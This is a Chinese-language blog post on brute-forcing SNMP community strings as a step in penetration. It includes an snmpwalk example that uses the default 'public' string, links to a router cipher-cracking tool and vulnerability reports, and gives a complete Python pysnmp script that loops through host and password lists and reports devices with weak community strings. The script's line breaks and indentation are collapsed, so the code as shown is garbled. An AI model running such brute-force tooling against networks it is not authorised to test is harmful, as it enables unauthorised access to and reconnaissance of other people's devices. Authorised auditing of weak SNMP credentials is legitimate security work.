snmp爆破(python脚本)

snmp用来获取信息,然后利用获取的信息来进一步的渗透。

命令行有 snmpwalk -v 2c -c public ip system

-c是密码,默认的密码是public

利用工具可以找windows下的slarwinds的工具包有个叫 ip browser

如果是华为的路由器,好像部分存在漏洞,可以用老外的工具搞搞:https://github.com/grutz/h3c-pt-tools/blob/master/hh3c_cipher.py

参考文章:

http://freeloda.blog.51cto.com/2033581/1306743   ----SNMP 原理与实战详解

http://pysnmp.sourceforge.net/quick-start.html      -----python snmp的包

http://www.wooyun.org/bugs/wooyun-2013-021964   ----乌云漏洞参考

http://www.wooyun.org/bugs/wooyun-2010-021877   ----乌云漏洞参考

http://drops.wooyun.org/tips/409                              ----乌云drops参考

代码

要先安装包

pip install pysnmp

#!/usr/local/bin/ python
# -*- coding: utf-8 -*- __author__ = 'yangxiaodi' from pysnmp.entity.rfc3413.oneliner import cmdgen def read_file(filepath):
f = open(filepath).readlines()
return f def snmp_connect(ip, key):
crack = 0
try:
errorIndication, errorStatus, errorIndex, varBinds = \
cmdgen.CommandGenerator().getCmd(
cmdgen.CommunityData('my-agent', key, 0),
cmdgen.UdpTransportTarget((ip, 161)),
(1, 3, 6, 1, 2, 1, 1, 1, 0)
)
if varBinds:
crack = 1
except:
pass
return crack def snmp_l():
try:
host = read_file('host.txt')
for ip in host:
ip = ip.replace('\n', '')
passd = read_file('pass.txt')
for pwd in passd:
pwd = pwd.replace('\n', '')
flag = snmp_connect(ip, key=pwd)
if flag == 1:
print("%s snmp has weaken password!!-----%s\r\n" % (ip, pwd))
break
else:
print "test %s snmp's scan fail" % (ip)
except Exception, e:
pass
if __name__ == '__main__':
snmp_l()

  

上一篇:含服务端,客户端,数据库的注册/登录/聊天/在线/离线查看的聊天demo


下一篇:聊天demo SignalR